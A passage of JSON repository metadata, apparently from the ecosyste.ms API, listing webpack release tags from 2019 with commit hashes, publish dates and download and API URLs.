f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/G